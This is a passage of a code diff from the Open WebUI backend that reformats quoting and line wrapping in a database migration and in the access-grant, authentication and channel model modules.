grants["read"]["user_ids"] - and not grants["write"]["group_ids"] - and not grants["write"]["user_ids"] + not grants['read']['group_ids'] + and not grants['read']['user_ids'] + and not grants['write']['group_ids'] + and not grants['write']['user_ids'] ): # No grants = should not happen (would mean no entries), default to {} access_control_value = json.dumps({}) else: # Custom permissions access_control_value = json.dumps( { - "read": grants["read"], - "write": grants["write"], + 'read': grants['read'], + 'write': grants['write'], } ) try: conn.execute( - sa.text( - f'UPDATE "{table_name}" SET access_control = :access_control WHERE id = :id' - ), - {"access_control": access_control_value, "id": resource_id}, + sa.text(f'UPDATE "{table_name}" SET access_control = :access_control WHERE id = :id'), + {'access_control': access_control_value, 'id': resource_id}, ) except Exception: pass # Step 4: Set all resources WITHOUT entries to private # For files: NULL means private (owner-only), so leave as NULL # For other resources: {} means private, so update to {} - if resource_type != "file": + if resource_type != 'file': try: conn.execute( sa.text(f""" @@ -357,13 +332,13 @@ def downgrade() -> None: ) AND access_control IS NULL """), - {"private_value": json.dumps({}), "resource_type": resource_type}, + {'private_value': json.dumps({}), 'resource_type': resource_type}, ) except Exception: pass # For files, NULL stays NULL - no action needed # Step 5: Drop the access_grant table - op.drop_index("idx_access_grant_principal", table_name="access_grant") - op.drop_index("idx_access_grant_resource", table_name="access_grant") - op.drop_table("access_grant") + op.drop_index('idx_access_grant_principal', table_name='access_grant') + op.drop_index('idx_access_grant_resource', table_name='access_grant') + op.drop_table('access_grant')
backend/open_webui/models/access_grants.py+99 −132 modified@@ -19,28 +19,24 @@ class AccessGrant(Base): - __tablename__ = "access_grant" + __tablename__ = 'access_grant' id = Column(Text, primary_key=True) - resource_type = Column( - Text, nullable=False - ) # "knowledge", "model", "prompt", "tool", "note", "channel", "file" + resource_type = Column(Text, nullable=False) # "knowledge", "model", "prompt", "tool", "note", "channel", "file" resource_id = Column(Text, nullable=False) principal_type = Column(Text, nullable=False) # "user" or "group" - principal_id = Column( - Text, nullable=False - ) # user_id, group_id, or "*" (wildcard for public) + principal_id = Column(Text, nullable=False) # user_id, group_id, or "*" (wildcard for public) permission = Column(Text, nullable=False) # "read" or "write" created_at = Column(BigInteger, nullable=False) __table_args__ = ( UniqueConstraint( - "resource_type", - "resource_id", - "principal_type", - "principal_id", - "permission", - name="uq_access_grant_grant", + 'resource_type', + 'resource_id', + 'principal_type', + 'principal_id', + 'permission', + name='uq_access_grant_grant', ), ) @@ -66,7 +62,7 @@ class AccessGrantResponse(BaseModel): permission: str @classmethod - def from_grant(cls, grant: "AccessGrantModel") -> "AccessGrantResponse": + def from_grant(cls, grant: 'AccessGrantModel') -> 'AccessGrantResponse': return cls( id=grant.id, principal_type=grant.principal_type, @@ -100,14 +96,14 @@ def access_control_to_grants( if access_control is None: # NULL → public read (user:* for read) # Exception: files with NULL are private (owner-only), no grants needed - if resource_type != "file": + if resource_type != 'file': grants.append( { - "resource_type": resource_type, - "resource_id": resource_id, - "principal_type": "user", - "principal_id": "*", - "permission": "read", + 'resource_type': resource_type, + 'resource_id': resource_id, + 'principal_type': 'user', + 'principal_id': '*', + 'permission': 'read', } ) return grants @@ -117,30 +113,30 @@ def access_control_to_grants( return grants # Parse structured permissions - for permission in ["read", "write"]: + for permission in ['read', 'write']: perm_data = access_control.get(permission, {}) if not perm_data: continue - for group_id in perm_data.get("group_ids", []): + for group_id in perm_data.get('group_ids', []): grants.append( { - "resource_type": resource_type, - "resource_id": resource_id, - "principal_type": "group", - "principal_id": group_id, - "permission": permission, + 'resource_type': resource_type, + 'resource_id': resource_id, + 'principal_type': 'group', + 'principal_id': group_id, + 'permission': permission, } ) - for user_id in perm_data.get("user_ids", []): + for user_id in perm_data.get('user_ids', []): grants.append( { - "resource_type": resource_type, - "resource_id": resource_id, - "principal_type": "user", - "principal_id": user_id, - "permission": permission, + 'resource_type': resource_type, + 'resource_id': resource_id, + 'principal_type': 'user', + 'principal_id': user_id, + 'permission': permission, } ) @@ -164,27 +160,23 @@ def normalize_access_grants(access_grants: Optional[list]) -> list[dict]: if not isinstance(grant, dict): continue - principal_type = grant.get("principal_type") - principal_id = grant.get("principal_id") - permission = grant.get("permission") + principal_type = grant.get('principal_type') + principal_id = grant.get('principal_id') + permission = grant.get('permission') - if principal_type not in ("user", "group"): + if principal_type not in ('user', 'group'): continue - if permission not in ("read", "write"): + if permission not in ('read', 'write'): continue if not isinstance(principal_id, str) or not principal_id: continue key = (principal_type, principal_id, permission) deduped[key] = { - "id": ( - grant.get("id") - if isinstance(grant.get("id"), str) and grant.get("id") - else str(uuid.uuid4()) - ), - "principal_type": principal_type, - "principal_id": principal_id, - "permission": permission, + 'id': (grant.get('id') if isinstance(grant.get('id'), str) and grant.get('id') else str(uuid.uuid4())), + 'principal_type': principal_type, + 'principal_id': principal_id, + 'permission': permission, } return list(deduped.values()) @@ -195,11 +187,7 @@ def has_public_read_access_grant(access_grants: Optional[list]) -> bool: Returns True when a direct grant list includes wildcard public-read. """ for grant in normalize_access_grants(access_grants): - if ( - grant["principal_type"] == "user" - and grant["principal_id"] == "*" - and grant["permission"] == "read" - ): + if grant['principal_type'] == 'user' and grant['principal_id'] == '*' and grant['permission'] == 'read': return True return False @@ -209,7 +197,7 @@ def has_user_access_grant(access_grants: Optional[list]) -> bool: Returns True when a direct grant list includes any non-wildcard user grant. """ for grant in normalize_access_grants(access_grants): - if grant["principal_type"] == "user" and grant["principal_id"] != "*": + if grant['principal_type'] == 'user' and grant['principal_id'] != '*': return True return False @@ -225,18 +213,9 @@ def strip_user_access_grants(access_grants: Optional[list]) -> list: grant for grant in access_grants if not ( - ( - grant.get("principal_type") - if isinstance(grant, dict) - else getattr(grant, "principal_type", None) - ) - == "user" - and ( - grant.get("principal_id") - if isinstance(grant, dict) - else getattr(grant, "principal_id", None) - ) - != "*" + (grant.get('principal_type') if isinstance(grant, dict) else getattr(grant, 'principal_type', None)) + == 'user' + and (grant.get('principal_id') if isinstance(grant, dict) else getattr(grant, 'principal_id', None)) != '*' ) ] @@ -260,29 +239,25 @@ def grants_to_access_control(grants: list) -> Optional[dict]: return {} # No grants = private/owner-only result = { - "read": {"group_ids": [], "user_ids": []}, - "write": {"group_ids": [], "user_ids": []}, + 'read': {'group_ids': [], 'user_ids': []}, + 'write': {'group_ids': [], 'user_ids': []}, } is_public = False for grant in grants: - if ( - grant.principal_type == "user" - and grant.principal_id == "*" - and grant.permission == "read" - ): + if grant.principal_type == 'user' and grant.principal_id == '*' and grant.permission == 'read': is_public = True continue # Don't add wildcard to user_ids list - if grant.permission not in ("read", "write"): + if grant.permission not in ('read', 'write'): continue - if grant.principal_type == "group": - if grant.principal_id not in result[grant.permission]["group_ids"]: - result[grant.permission]["group_ids"].append(grant.principal_id) - elif grant.principal_type == "user": - if grant.principal_id not in result[grant.permission]["user_ids"]: - result[grant.permission]["user_ids"].append(grant.principal_id) + if grant.principal_type == 'group': + if grant.principal_id not in result[grant.permission]['group_ids']: + result[grant.permission]['group_ids'].append(grant.principal_id) + elif grant.principal_type == 'user': + if grant.principal_id not in result[grant.permission]['user_ids']: + result[grant.permission]['user_ids'].append(grant.principal_id) if is_public: return None # Public read access @@ -399,9 +374,7 @@ def set_access_control( ).delete() # Convert JSON to grant dicts - grant_dicts = access_control_to_grants( - resource_type, resource_id, access_control - ) + grant_dicts = access_control_to_grants(resource_type, resource_id, access_control) # Insert new grants results = [] @@ -442,9 +415,9 @@ def set_access_grants( id=str(uuid.uuid4()), resource_type=resource_type, resource_id=resource_id, - principal_type=grant_dict["principal_type"], - principal_id=grant_dict["principal_id"], - permission=grant_dict["permission"], + principal_type=grant_dict['principal_type'], + principal_id=grant_dict['principal_id'], + permission=grant_dict['permission'], created_at=int(time.time()), ) db.add(grant) @@ -511,9 +484,7 @@ def get_grants_by_resources( ) .all() ) - result: dict[str, list[AccessGrantModel]] = { - rid: [] for rid in resource_ids - } + result: dict[str, list[AccessGrantModel]] = {rid: [] for rid in resource_ids} for g in grants: result[g.resource_id].append(AccessGrantModel.model_validate(g)) return result @@ -523,7 +494,7 @@ def has_access( user_id: str, resource_type: str, resource_id: str, - permission: str = "read", + permission: str = 'read', user_group_ids: Optional[set[str]] = None, db: Optional[Session] = None, ) -> bool: @@ -540,12 +511,12 @@ def has_access( conditions = [ # Public access and_( - AccessGrant.principal_type == "user", - AccessGrant.principal_id == "*", + AccessGrant.principal_type == 'user', + AccessGrant.principal_id == '*', ), # Direct user access and_( - AccessGrant.principal_type == "user", + AccessGrant.principal_type == 'user', AccessGrant.principal_id == user_id, ), ] @@ -560,7 +531,7 @@ def has_access( if user_group_ids: conditions.append( and_( - AccessGrant.principal_type == "group", + AccessGrant.principal_type == 'group', AccessGrant.principal_id.in_(user_group_ids), ) ) @@ -582,7 +553,7 @@ def get_accessible_resource_ids( user_id: str, resource_type: str, resource_ids: list[str], - permission: str = "read", + permission: str = 'read', user_group_ids: Optional[set[str]] = None, db: Optional[Session] = None, ) -> set[str]: @@ -597,11 +568,11 @@ def get_accessible_resource_ids( with get_db_context(db) as db: conditions = [ and_( - AccessGrant.principal_type == "user", - AccessGrant.principal_id == "*", + AccessGrant.principal_type == 'user', + AccessGrant.principal_id == '*', ), and_( - AccessGrant.principal_type == "user", + AccessGrant.principal_type == 'user', AccessGrant.principal_id == user_id, ), ] @@ -615,7 +586,7 @@ def get_accessible_resource_ids( if user_group_ids: conditions.append( and_( - AccessGrant.principal_type == "group", + AccessGrant.principal_type == 'group', AccessGrant.principal_id.in_(user_group_ids), ) ) @@ -637,7 +608,7 @@ def get_users_with_access( self, resource_type: str, resource_id: str, - permission: str = "read", + permission: str = 'read', db: Optional[Session] = None, ) -> list: """ @@ -660,19 +631,17 @@ def get_users_with_access( # Check for public access for grant in grants: - if grant.principal_type == "user" and grant.principal_id == "*": - result = Users.get_users(filter={"roles": ["!pending"]}, db=db) - return result.get("users", []) + if grant.principal_type == 'user' and grant.principal_id == '*': + result = Users.get_users(filter={'roles': ['!pending']}, db=db) + return result.get('users', []) user_ids_with_access = set() for grant in grants: - if grant.principal_type == "user": + if grant.principal_type == 'user': user_ids_with_access.add(grant.principal_id) - elif grant.principal_type == "group": - group_user_ids = Groups.get_group_user_ids_by_id( - grant.principal_id, db=db - ) + elif grant.principal_type == 'group': + group_user_ids = Groups.get_group_user_ids_by_id(grant.principal_id, db=db) if group_user_ids: user_ids_with_access.update(group_user_ids) @@ -688,20 +657,18 @@ def has_permission_filter( DocumentModel, filter: dict, resource_type: str, - permission: str = "read", + permission: str = 'read', ): """ Apply access control filtering to a SQLAlchemy query by JOINing with access_grant. This replaces the old JSON-column-based filtering with a proper relational JOIN. """ - group_ids = filter.get("group_ids", []) - user_id = filter.get("user_id") + group_ids = filter.get('group_ids', []) + user_id = filter.get('user_id') - if permission == "read_only": - return self._has_read_only_permission_filter( - db, query, DocumentModel, filter, resource_type - ) + if permission == 'read_only': + return self._has_read_only_permission_filter(db, query, DocumentModel, filter, resource_type) # Build principal conditions principal_conditions = [] @@ -710,8 +677,8 @@ def has_permission_filter( # Public access: user:* read principal_conditions.append( and_( - AccessGrant.principal_type == "user", - AccessGrant.principal_id == "*", + AccessGrant.principal_type == 'user', + AccessGrant.principal_id == '*', ) ) @@ -722,7 +689,7 @@ def has_permission_filter( # Direct user grant principal_conditions.append( and_( - AccessGrant.principal_type == "user", + AccessGrant.principal_type == 'user', AccessGrant.principal_id == user_id, ) ) @@ -731,7 +698,7 @@ def has_permission_filter( # Group grants principal_conditions.append( and_( - AccessGrant.principal_type == "group", + AccessGrant.principal_type == 'group', AccessGrant.principal_id.in_(group_ids), ) ) @@ -751,13 +718,13 @@ def has_permission_filter( AccessGrant.permission == permission, or_( and_( - AccessGrant.principal_type == "user", - AccessGrant.principal_id == "*", + AccessGrant.principal_type == 'user', + AccessGrant.principal_id == '*', ), *( [ and_( - AccessGrant.principal_type == "user", + AccessGrant.principal_type == 'user', AccessGrant.principal_id == user_id, ) ] @@ -767,7 +734,7 @@ def has_permission_filter( *( [ and_( - AccessGrant.principal_type == "group", + AccessGrant.principal_type == 'group', AccessGrant.principal_id.in_(group_ids), ) ] @@ -800,8 +767,8 @@ def _has_read_only_permission_filter( Filter for items where user has read BUT NOT write access. Public items are NOT considered read_only. """ - group_ids = filter.get("group_ids", []) - user_id = filter.get("user_id") + group_ids = filter.get('group_ids', []) + user_id = filter.get('user_id') from sqlalchemy import exists as sa_exists, select @@ -811,12 +778,12 @@ def _has_read_only_permission_filter( .where( AccessGrant.resource_type == resource_type, AccessGrant.resource_id == DocumentModel.id, - AccessGrant.permission == "read", + AccessGrant.permission == 'read', or_( *( [ and_( - AccessGrant.principal_type == "user", + AccessGrant.principal_type == 'user', AccessGrant.principal_id == user_id, ) ] @@ -826,7 +793,7 @@ def _has_read_only_permission_filter( *( [ and_( - AccessGrant.principal_type == "group", + AccessGrant.principal_type == 'group', AccessGrant.principal_id.in_(group_ids), ) ] @@ -845,12 +812,12 @@ def _has_read_only_permission_filter( .where( AccessGrant.resource_type == resource_type, AccessGrant.resource_id == DocumentModel.id, - AccessGrant.permission == "write", + AccessGrant.permission == 'write', or_( *( [ and_( - AccessGrant.principal_type == "user", + AccessGrant.principal_type == 'user', AccessGrant.principal_id == user_id, ) ] @@ -860,7 +827,7 @@ def _has_read_only_permission_filter( *( [ and_( - AccessGrant.principal_type == "group", + AccessGrant.principal_type == 'group', AccessGrant.principal_id.in_(group_ids), ) ] @@ -879,9 +846,9 @@ def _has_read_only_permission_filter( .where( AccessGrant.resource_type == resource_type, AccessGrant.resource_id == DocumentModel.id, - AccessGrant.permission == "read", - AccessGrant.principal_type == "user", - AccessGrant.principal_id == "*", + AccessGrant.permission == 'read', + AccessGrant.principal_type == 'user', + AccessGrant.principal_id == '*', ) .correlate(DocumentModel) .exists()
backend/open_webui/models/auths.py+19 −33 modified@@ -17,7 +17,7 @@ class Auth(Base): - __tablename__ = "auth" + __tablename__ = 'auth' id = Column(String, primary_key=True, unique=True) email = Column(String) @@ -73,9 +73,9 @@ class SignupForm(BaseModel): name: str email: str password: str - profile_image_url: Optional[str] = "/user.png" + profile_image_url: Optional[str] = '/user.png' - @field_validator("profile_image_url") + @field_validator('profile_image_url') @classmethod def check_profile_image_url(cls, v: Optional[str]) -> Optional[str]: if v is not None: @@ -84,7 +84,7 @@ def check_profile_image_url(cls, v: Optional[str]) -> Optional[str]: class AddUserForm(SignupForm): - role: Optional[str] = "pending" + role: Optional[str] = 'pending' class AuthsTable: @@ -93,25 +93,21 @@ def insert_new_auth( email: str, password: str, name: str, - profile_image_url: str = "/user.png", - role: str = "pending", + profile_image_url: str = '/user.png', + role: str = 'pending', oauth: Optional[dict] = None, db: Optional[Session] = None, ) -> Optional[UserModel]: with get_db_context(db) as db: - log.info("insert_new_auth") + log.info('insert_new_auth') id = str(uuid.uuid4()) - auth = AuthModel( - **{"id": id, "email": email, "password": password, "active": True} - ) + auth = AuthModel(**{'id': id, 'email': email, 'password': password, 'active': True}) result = Auth(**auth.model_dump()) db.add(result) - user = Users.insert_new_user( - id, name, email, profile_image_url, role, oauth=oauth, db=db - ) + user = Users.insert_new_user(id, name, email, profile_image_url, role, oauth=oauth, db=db) db.commit() db.refresh(result) @@ -124,7 +120,7 @@ def insert_new_auth( def authenticate_user( self, email: str, verify_password: callable, db: Optional[Session] = None ) -> Optional[UserModel]: - log.info(f"authenticate_user: {email}") + log.info(f'authenticate_user: {email}') user = Users.get_user_by_email(email, db=db) if not user: @@ -143,10 +139,8 @@ def authenticate_user( except Exception: return None - def authenticate_user_by_api_key( - self, api_key: str, db: Optional[Session] = None - ) -> Optional[UserModel]: - log.info(f"authenticate_user_by_api_key") + def authenticate_user_by_api_key(self, api_key: str, db: Optional[Session] = None) -> Optional[UserModel]: + log.info(f'authenticate_user_by_api_key') # if no api_key, return None if not api_key: return None @@ -157,10 +151,8 @@ def authenticate_user_by_api_key( except Exception: return False - def authenticate_user_by_email( - self, email: str, db: Optional[Session] = None - ) -> Optional[UserModel]: - log.info(f"authenticate_user_by_email: {email}") + def authenticate_user_by_email(self, email: str, db: Optional[Session] = None) -> Optional[UserModel]: + log.info(f'authenticate_user_by_email: {email}') try: with get_db_context(db) as db: # Single JOIN query instead of two separate queries @@ -177,28 +169,22 @@ def authenticate_user_by_email( except Exception: return None - def update_user_password_by_id( - self, id: str, new_password: str, db: Optional[Session] = None - ) -> bool: + def update_user_password_by_id(self, id: str, new_password: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - result = ( - db.query(Auth).filter_by(id=id).update({"password": new_password}) - ) + result = db.query(Auth).filter_by(id=id).update({'password': new_password}) db.commit() return True if result == 1 else False except Exception: return False - def update_email_by_id( - self, id: str, email: str, db: Optional[Session] = None - ) -> bool: + def update_email_by_id(self, id: str, email: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - result = db.query(Auth).filter_by(id=id).update({"email": email}) + result = db.query(Auth).filter_by(id=id).update({'email': email}) db.commit() if result == 1: - Users.update_user_by_id(id, {"email": email}, db=db) + Users.update_user_by_id(id, {'email': email}, db=db) return True return False except Exception:
backend/open_webui/models/channels.py+112 −219 modified@@ -37,7 +37,7 @@ class Channel(Base): - __tablename__ = "channel" + __tablename__ = 'channel' id = Column(Text, primary_key=True, unique=True) user_id = Column(Text) @@ -94,7 +94,7 @@ class ChannelModel(BaseModel): class ChannelMember(Base): - __tablename__ = "channel_member" + __tablename__ = 'channel_member' id = Column(Text, primary_key=True, unique=True) channel_id = Column(Text, nullable=False) @@ -154,25 +154,19 @@ class ChannelMemberModel(BaseModel): class ChannelFile(Base): - __tablename__ = "channel_file" + __tablename__ = 'channel_file' id = Column(Text, unique=True, primary_key=True) user_id = Column(Text, nullable=False) - channel_id = Column( - Text, ForeignKey("channel.id", ondelete="CASCADE"), nullable=False - ) - message_id = Column( - Text, ForeignKey("message.id", ondelete="CASCADE"), nullable=True - ) - file_id = Column(Text, ForeignKey("file.id", ondelete="CASCADE"), nullable=False) + channel_id = Column(Text, ForeignKey('channel.id', ondelete='CASCADE'), nullable=False) + message_id = Column(Text, ForeignKey('message.id', ondelete='CASCADE'), nullable=True) + file_id = Column(Text, ForeignKey('file.id', ondelete='CASCADE'), nullable=False) created_at = Column(BigInteger, nullable=False) updated_at = Column(BigInteger, nullable=False) - __table_args__ = ( - UniqueConstraint("channel_id", "file_id", name="uq_channel_file_channel_file"), - ) + __table_args__ = (UniqueConstraint('channel_id', 'file_id', name='uq_channel_file_channel_file'),) class ChannelFileModel(BaseModel): @@ -189,7 +183,7 @@ class ChannelFileModel(BaseModel): class ChannelWebhook(Base): - __tablename__ = "channel_webhook" + __tablename__ = 'channel_webhook' id = Column(Text, primary_key=True, unique=True) channel_id = Column(Text, nullable=False) @@ -235,7 +229,7 @@ class ChannelResponse(ChannelModel): class ChannelForm(BaseModel): - name: str = "" + name: str = '' description: Optional[str] = None is_private: Optional[bool] = None data: Optional[dict] = None @@ -255,24 +249,18 @@ class ChannelWebhookForm(BaseModel): class ChannelTable: - def _get_access_grants( - self, channel_id: str, db: Optional[Session] = None - ) -> list[AccessGrantModel]: - return AccessGrants.get_grants_by_resource("channel", channel_id, db=db) + def _get_access_grants(self, channel_id: str, db: Optional[Session] = None) -> list[AccessGrantModel]: + return AccessGrants.get_grants_by_resource('channel', channel_id, db=db) def _to_channel_model( self, channel: Channel, access_grants: Optional[list[AccessGrantModel]] = None, db: Optional[Session] = None, ) -> ChannelModel: - channel_data = ChannelModel.model_validate(channel).model_dump( - exclude={"access_grants"} - ) - channel_data["access_grants"] = ( - access_grants - if access_grants is not None - else self._get_access_grants(channel_data["id"], db=db) + channel_data = ChannelModel.model_validate(channel).model_dump(exclude={'access_grants'}) + channel_data['access_grants'] = ( + access_grants if access_grants is not None else self._get_access_grants(channel_data['id'], db=db) ) return ChannelModel.model_validate(channel_data) @@ -313,20 +301,20 @@ def _create_membership_models( for uid in user_ids: model = ChannelMemberModel( **{ - "id": str(uuid.uuid4()), - "channel_id": channel_id, - "user_id": uid, - "status": "joined", - "is_active": True, - "is_channel_muted": False, - "is_channel_pinned": False, - "invited_at": now, - "invited_by": invited_by, - "joined_at": now, - "left_at": None, - "last_read_at": now, - "created_at": now, - "updated_at": now, + 'id': str(uuid.uuid4()), + 'channel_id': channel_id, + 'user_id': uid, + 'status': 'joined', + 'is_active': True, + 'is_channel_muted': False, + 'is_channel_pinned': False, + 'invited_at': now, + 'invited_by': invited_by, + 'joined_at': now, + 'left_at': None, + 'last_read_at': now, + 'created_at': now, + 'updated_at': now, } ) memberships.append(ChannelMember(**model.model_dump())) @@ -339,19 +327,19 @@ def insert_new_channel( with get_db_context(db) as db: channel = ChannelModel( **{ - **form_data.model_dump(exclude={"access_grants"}), - "type": form_data.type if form_data.type else None, - "name": form_data.name.lower(), - "id": str(uuid.uuid4()), - "user_id": user_id, - "created_at": int(time.time_ns()), - "updated_at": int(time.time_ns()), - "access_grants": [], + **form_data.model_dump(exclude={'access_grants'}), + 'type': form_data.type if form_data.type else None, + 'name': form_data.name.lower(), + 'id': str(uuid.uuid4()), + 'user_id': user_id, + 'created_at': int(time.time_ns()), + 'updated_at': int(time.time_ns()), + 'access_grants': [], } ) - new_channel = Channel(**channel.model_dump(exclude={"access_grants"})) + new_channel = Channel(**channel.model_dump(exclude={'access_grants'})) - if form_data.type in ["group", "dm"]: + if form_data.type in ['group', 'dm']: users = self._collect_unique_user_ids( invited_by=user_id, user_ids=form_data.user_ids, @@ -366,18 +354,14 @@ def insert_new_channel( db.add_all(memberships) db.add(new_channel) db.commit() - AccessGrants.set_access_grants( - "channel", new_channel.id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('channel', new_channel.id, form_data.access_grants, db=db) return self._to_channel_model(new_channel, db=db) def get_channels(self, db: Optional[Session] = None) -> list[ChannelModel]: with get_db_context(db) as db: channels = db.query(Channel).all() channel_ids = [channel.id for channel in channels] - grants_map = AccessGrants.get_grants_by_resources( - "channel", channel_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('channel', channel_ids, db=db) return [ self._to_channel_model( channel, @@ -387,31 +371,27 @@ def get_channels(self, db: Optional[Session] = None) -> list[ChannelModel]: for channel in channels ] - def _has_permission(self, db, query, filter: dict, permission: str = "read"): + def _has_permission(self, db, query, filter: dict, permission: str = 'read'): return AccessGrants.has_permission_filter( db=db, query=query, DocumentModel=Channel, filter=filter, - resource_type="channel", + resource_type='channel', permission=permission, ) - def get_channels_by_user_id( - self, user_id: str, db: Optional[Session] = None - ) -> list[ChannelModel]: + def get_channels_by_user_id(self, user_id: str, db: Optional[Session] = None) -> list[ChannelModel]: with get_db_context(db) as db: - user_group_ids = [ - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - ] + user_group_ids = [group.id for group in Groups.get_groups_by_member_id(user_id, db=db)] membership_channels = ( db.query(Channel) .join(ChannelMember, Channel.id == ChannelMember.channel_id) .filter( Channel.deleted_at.is_(None), Channel.archived_at.is_(None), - Channel.type.in_(["group", "dm"]), + Channel.type.in_(['group', 'dm']), ChannelMember.user_id == user_id, ChannelMember.is_active.is_(True), ) @@ -423,29 +403,20 @@ def get_channels_by_user_id( Channel.archived_at.is_(None), or_( Channel.type.is_(None), # True NULL/None - Channel.type == "", # Empty string - and_(Channel.type != "group", Channel.type != "dm"), + Channel.type == '', # Empty string + and_(Channel.type != 'group', Channel.type != 'dm'), ), ) - query = self._has_permission( - db, query, {"user_id": user_id, "group_ids": user_group_ids} - ) + query = self._has_permission(db, query, {'user_id': user_id, 'group_ids': user_group_ids}) standard_channels = query.all() all_channels = membership_channels + standard_channels channel_ids = [c.id for c in all_channels] - grants_map = AccessGrants.get_grants_by_resources( - "channel", channel_ids, db=db - ) - return [ - self._to_channel_model(c, access_grants=grants_map.get(c.id, []), db=db) - for c in all_channels - ] + grants_map = AccessGrants.get_grants_by_resources('channel', channel_ids, db=db) + return [self._to_channel_model(c, access_grants=grants_map.get(c.id, []), db=db) for c in all_channels] - def get_dm_channel_by_user_ids( - self, user_ids: list[str], db: Optional[Session] = None - ) -> Optional[ChannelModel]: + def get_dm_channel_by_user_ids(self, user_ids: list[str], db: Optional[Session] = None) -> Optional[ChannelModel]: with get_db_context(db) as db: # Ensure uniqueness in case a list with duplicates is passed unique_user_ids = list(set(user_ids)) @@ -471,7 +442,7 @@ def get_dm_channel_by_user_ids( db.query(Channel) .filter( Channel.id.in_(subquery), - Channel.type == "dm", + Channel.type == 'dm', ) .first() ) @@ -488,32 +459,23 @@ def add_members_to_channel( ) -> list[ChannelMemberModel]: with get_db_context(db) as db: # 1. Collect all user_ids including groups + inviter - requested_users = self._collect_unique_user_ids( - invited_by, user_ids, group_ids - ) + requested_users = self._collect_unique_user_ids(invited_by, user_ids, group_ids) existing_users = { row.user_id - for row in db.query(ChannelMember.user_id) - .filter(ChannelMember.channel_id == channel_id) - .all() + for row in db.query(ChannelMember.user_id).filter(ChannelMember.channel_id == channel_id).all() } new_user_ids = requested_users - existing_users if not new_user_ids: return [] # Nothing to add - new_memberships = self._create_membership_models( - channel_id, invited_by, new_user_ids - ) + new_memberships = self._create_membership_models(channel_id, invited_by, new_user_ids) db.add_all(new_memberships) db.commit() - return [ - ChannelMemberModel.model_validate(membership) - for membership in new_memberships - ] + return [ChannelMemberModel.model_validate(membership) for membership in new_memberships] def remove_members_from_channel( self, @@ -533,9 +495,7 @@ def remove_members_from_channel( db.commit() return result # number of rows deleted - def is_user_channel_manager( - self, channel_id: str, user_id: str, db: Optional[Session] = None - ) -> bool: + def is_user_channel_manager(self, channel_id: str, user_id: str, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: # Check if the user is the creator of the channel # or has a 'manager' role in ChannelMember @@ -548,15 +508,13 @@ def is_user_channel_manager( .filter( ChannelMember.channel_id == channel_id, ChannelMember.user_id == user_id, - ChannelMember.role == "manager", + ChannelMember.role == 'manager', ) .first() ) return membership is not None - def join_channel( - self, channel_id: str, user_id: str, db: Optional[Session] = None - ) -> Optional[ChannelMemberModel]: + def join_channel(self, channel_id: str, user_id: str, db: Optional[Session] = None) -> Optional[ChannelMemberModel]: with get_db_context(db) as db: # Check if the membership already exists existing_membership = ( @@ -573,18 +531,18 @@ def join_channel( # Create new membership channel_member = ChannelMemberModel( **{ - "id": str(uuid.uuid4()), - "channel_id": channel_id, - "user_id": user_id, - "status": "joined", - "is_active": True, - "is_channel_muted": False, - "is_channel_pinned": False, - "joined_at": int(time.time_ns()), - "left_at": None, - "last_read_at": int(time.time_ns()), - "created_at": int(time.time_ns()), - "updated_at": int(time.time_ns()), + 'id': str(uuid.uuid4()), + 'channel_id': channel_id, + 'user_id': user_id, + 'status': 'joined', + 'is_active': True, + 'is_channel_muted': False, + 'is_channel_pinned': False, + 'joined_at': int(time.time_ns()), + 'left_at': None, + 'last_read_at': int(time.time_ns()), + 'created_at': int(time.time_ns()), + 'updated_at': int(time.time_ns()), } ) new_membership = ChannelMember(**channel_member.model_dump()) @@ -593,9 +551,7 @@ def join_channel( db.commit() return channel_member - def leave_channel( - self, channel_id: str, user_id: str, db: Optional[Session] = None - ) -> bool: + def leave_channel(self, channel_id: str, user_id: str, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: membership = ( db.query(ChannelMember) @@ -608,7 +564,7 @@ def leave_channel( if not membership: return False - membership.status = "left" + membership.status = 'left' membership.is_active = False membership.left_at = int(time.time_ns()) membership.updated_at = int(time.time_ns()) @@ -630,19 +586,10 @@ def get_member_by_channel_and_user_id( ) return ChannelMemberModel.model_validate(membership) if membership else None - def get_members_by_channel_id( - self, channel_id: str, db: Optional[Session] = None - ) -> list[ChannelMemberModel]: + def get_members_by_channel_id(self, channel_id: str, db: Optional[Session] = None) -> list[ChannelMemberModel]: with get_db_context(db) as db: - memberships = ( - db.query(ChannelMember) - .filter(ChannelMember.channel_id == channel_id) - .all() - ) - return [ - ChannelMemberModel.model_validate(membership) - for membership in memberships - ] + memberships = db.query(ChannelMember).filter(ChannelMember.channel_id == channel_id).all() + return [ChannelMemberModel.model_validate(membership) for membership in memberships] def pin_channel( self, @@ -669,9 +616,7 @@ def pin_channel( db.commit() return True - def update_member_last_read_at( - self, channel_id: str, user_id: str, db: Optional[Session] = None - ) -> bool: + def update_member_last_read_at(self, channel_id: str, user_id: str, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: membership = ( db.query(ChannelMember) @@ -715,9 +660,7 @@ def update_member_active_status( db.commit() return True - def is_user_channel_member( - self, channel_id: str, user_id: str, db: Optional[Session] = None - ) -> bool: + def is_user_channel_member(self, channel_id: str, user_id: str, db: Optional[Session] = None) -> bool: with get_db_context(db) as db: membership = ( db.query(ChannelMember) @@ -729,28 +672,20 @@ def is_user_channel_member( ) return membership is not None - def get_channel_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[ChannelModel]: + def get_channel_by_id(self, id: str, db: Optional[Session] = None) -> Optional[ChannelModel]: try: with get_db_context(db) as db: channel = db.query(Channel).filter(Channel.id == id).first() return self._to_channel_model(channel, db=db) if channel else None except Exception: return None - def get_channels_by_file_id( - self, file_id: str, db: Optional[Session] = None - ) -> list[ChannelModel]: + def get_channels_by_file_id(self, file_id: str, db: Optional[Session] = None) -> list[ChannelModel]: with get_db_context(db) as db: - channel_files = ( - db.query(ChannelFile).filter(ChannelFile.file_id == file_id).all() - ) + channel_files = db.query(ChannelFile).filter(ChannelFile.file_id == file_id).all() channel_ids = [cf.channel_id for cf in channel_files] channels = db.query(Channel).filter(Channel.id.in_(channel_ids)).all() - grants_map = AccessGrants.get_grants_by_resources( - "channel", channel_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('channel', channel_ids, db=db) return [ self._to_channel_model( channel, @@ -765,9 +700,7 @@ def 